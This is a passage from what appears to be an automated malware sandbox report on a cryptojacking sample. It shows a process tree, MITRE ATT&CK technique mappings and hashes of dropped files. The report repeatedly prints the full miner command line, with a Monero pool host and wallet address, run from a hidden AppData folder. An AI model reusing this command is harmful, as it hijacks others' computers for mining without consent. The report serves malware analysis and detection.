      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2416
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2480
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2788
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:596
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1164
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2596
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1544
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2288
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1112
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2088
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1676
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:3032
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1096
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1624
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1176
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1360
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:3036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2112
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2056
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1684
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2584
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2548
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2164
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2384
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1872
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1904
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1400
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2204
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1760
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2820
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2532
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2884
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:1560
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2054330237-10864436311134353873-1928380297-891116999-793477276-1152966286737677042"
1⤵
- Executes dropped EXE
PID:2292

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1756653356-510887728-1663853030-1106630557-10561318123408137081526034631-956685199"
1⤵
- Executes dropped EXE
PID:2084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-480929351-1580969228348149590-1486545667-1094820449-1177459218-9905168451414564571"
1⤵
- Executes dropped EXE
PID:2268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1899870116-1708715965-1730625875-764240966-1700136969-38994380011068967681489849625"
1⤵
- Executes dropped EXE
PID:2724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-859525955108975739117004889-3127713744001713948121685251364205476449297180"
1⤵
- Executes dropped EXE
PID:700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2032692994431681210245357041-804400185-13534834072003532759-2020898858372312847"
1⤵
- Executes dropped EXE
PID:764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-86677831017007873091521943595-1719046597455486326-1580278336-792273110-1763396527"
1⤵
PID:2604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1437236385168670712-14107966071823554643-46373038421298070311964702279-910202043"
1⤵
PID:2168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

Filesize
4.0MB

MD5
627beeff653f2b7a84ffe5c0c22d86cb

SHA1
8ba37c58f5812120ac013812fe57218c10960158

SHA256
c6b22b30b4d953c0feef5549d39a1e08491903b3c0f327f3ac67f6abd45461ab

SHA512
52f82f7d620d6cf2504749a65ea8d6995bb4132b9fb793964652f5140856db4933db49f394565be564787e828c3e5b80a579a7d41f6137ba2caa90967cbcbc8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.1MB

MD5
4ae41b20ad437115315dfaad5b2f9c01

SHA1
4d0d8f8cf4efe750f7b0bab09f537b49d90b1af0

SHA256
48a0e69db7fad6519c03eafbd7582f44cda4a63701a3226575bfeebb7e83681e

SHA512
082c1f908dbf7cccaeb6bb90d9164d4b2f66011e29150674c667d9b060c22c947c0fdf5910a8a5af27b87328017f3a25d87f8fbbd3017402a705102b9782dfb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
4.0MB

MD5
627beeff653f2b7a84ffe5c0c22d86cb

SHA1
8ba37c58f5812120ac013812fe57218c10960158

SHA256
c6b22b30b4d953c0feef5549d39a1e08491903b3c0f327f3ac67f6abd45461ab

SHA512
52f82f7d620d6cf2504749a65ea8d6995bb4132b9fb793964652f5140856db4933db49f394565be564787e828c3e5b80a579a7d41f6137ba2caa90967cbcbc8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
1.7MB

MD5
f09f5ed6ce3f7f3c99b9b6a495205d6e

SHA1
12d91f2079d056cfc0925ed43a6a008e1e0e78e9

SHA256
eaab252da1cf63c9a5e7a2643205381c917d4318821acc08c5266d6e3b01dcaa

SHA512
e93157456c8a66c45c62b3b89f5e5531c91705128a46eea817cd5bd2df5d5f60e4a100f2f6d56b76cee4d5c562c356339585ddfaca899bc261182021020d8068

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
1.7MB

MD5
da17f52bd11d332fc152a48e6dd3298f

SHA1
c1a4fcc26b8e307046e6161672522e56e1cd5e6e

SHA256
7d3daad9e171e543425620ddefda34aa808ad548cbbe64ab4438b40f42b343ce

SHA512
14da2d3d7dd0317eeb72ca5dbaa19256c45de09e281a5a61e197bb8ba14864dd18bdb8b829ba834199993bedd8dd3e293e2f2610923e7266a4f83fe1f03e65c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

Filesize
1.7MB

MD5
7f8d3b694741d5d546f9b113f07724d6

SHA1
2710d7e7685efb138a0004dcb15b89caa254240b

SHA256
84f7980613b6962689d85e4575978b96aa9ba68d68fd2208d195f1b05546ffb8

SHA512
b4573836a17bc2886bfeb17c368657b2ca3c16dfb73cb8bd81ffa082a112484e7a2fa6b471752ac8c3d2d1359161202f9e898bdf8d6901cb23f10579e03896bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

Filesize
1.7MB

MD5
7764561cc8aaf2e5de73fff3762ad06a

SHA1
6213a9f483f23b52a8071a7dc9e685a48576f6cb

SHA256
ab3a6a93563cb721d840da807d4653c9b28c65aa5a0813010d6078dff2a46dc1

SHA512
2bb104b157a06e6e357761ea3e569f0c60d2dfb906bd697cfe35234d3bc4768cd6ecfd012b358880f28daba85408d56cb66e07a1aa05c35455e0ca2e3602efc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

Filesize
1.7MB

MD5
d41367182a98244cd1498230bc7f01da

SHA1
3ba6a54689d517b1bf890ce5bea039802b540d9f

SHA256
38ad59813e651abe0fef75f86fb32c88d371256fa30d6b854622750811d2b8e1

SHA512
cbefa6d99344c3a7bd81d6af45297669e440fb768402ce0b23d2eabb0cc640aef3a8d4c6855995aa5d3eb26903bf36d21d58151d534a525273775ab35cdde603

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

Filesize
1.7MB

MD5
035d5f7b48800dcf61d13dabeadb13f7

SHA1
64619526d5f84d6c0ed8f26b2abd6248675befe0

SHA256
edc14c6f7605dfaa17f8e6ca9443c54af70be54a732561d69aebf59ce9d2034a

SHA512
9a51589ecd982810c825e5b5adc7c68d03855c9225c05c08199c87b76725570914bb1a77cddac293f37ca65131fba0dda70933bd225ae4fc7ecf7a9c6fa84c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

Filesize
1.7MB

MD5
2405a346d01b31364b5f64d97b4e52bd

SHA1
7de562af0f95895242d2f5684bf14583fe5640fa

SHA256
72869ff16b3e9bb86cbff2d97b3583afaf01bb382a2f12707c03b6fe73bcd92f

SHA512
c37474546d3554bd15a805e8b7efc476376c0769e309bd9c6e779950c59aed564c32927856a1162832845f8e9de0da2fb39635c608da11e6b919a36701faa96d

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

Filesize
3.2MB

MD5
11dcc361f2a1ea1cf451ef550c736294

SHA1
c6a735b28579c3b15876f6ac2f29b94b13c9859b

SHA256
7a35591062852bd2537c993d03812c2e65cb594e225d5a72a2c5c3a3ac7b6aec

SHA512
b269228aafa8cefd46df4334af2530dc35940377354780fc05b72596e37aac7680911b2b62bff0ea042c93f6468b58cde4cbfeee43fcc4a614e18e3832267028

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
3.2MB

MD5
d2d25d8a9f139a5faf29f119d29e0dc3

SHA1
f3cb9efc1ead436b5101aac347b28e19687bbbe3

SHA256
75e6d32d32ee643d98123b2999693c6048010f37b0430423b7478543b367bdfb

SHA512
56b18e6607896de5322f353d826b6f05ffffaa29bdee824dc4a6423abbe6bccb33796c4ccfe7b8ce563e483da272150a4a35c1ae143749a48ffcea3f125f8e95

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
473B

MD5
ff380a078082ae8f34bce9acae198e55

SHA1
ea7ad0d5c46199ed449188b8539c44713bf37eda

SHA256
81e4024845613b6775720ef6e280d7185aac847c629296d16184fe42e31eba15

SHA512
f09a648e3138a344485bdb74cd584813f8973377af18e26eb58e6b577460b9fbc05062953ffe9a672c975711afb62629357893a2791bbbfc61bf3f8a1c1f4fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
473B

MD5
ff380a078082ae8f34bce9acae198e55

SHA1
ea7ad0d5c46199ed449188b8539c44713bf37eda

SHA256
81e4024845613b6775720ef6e280d7185aac847c629296d16184fe42e31eba15

SHA512
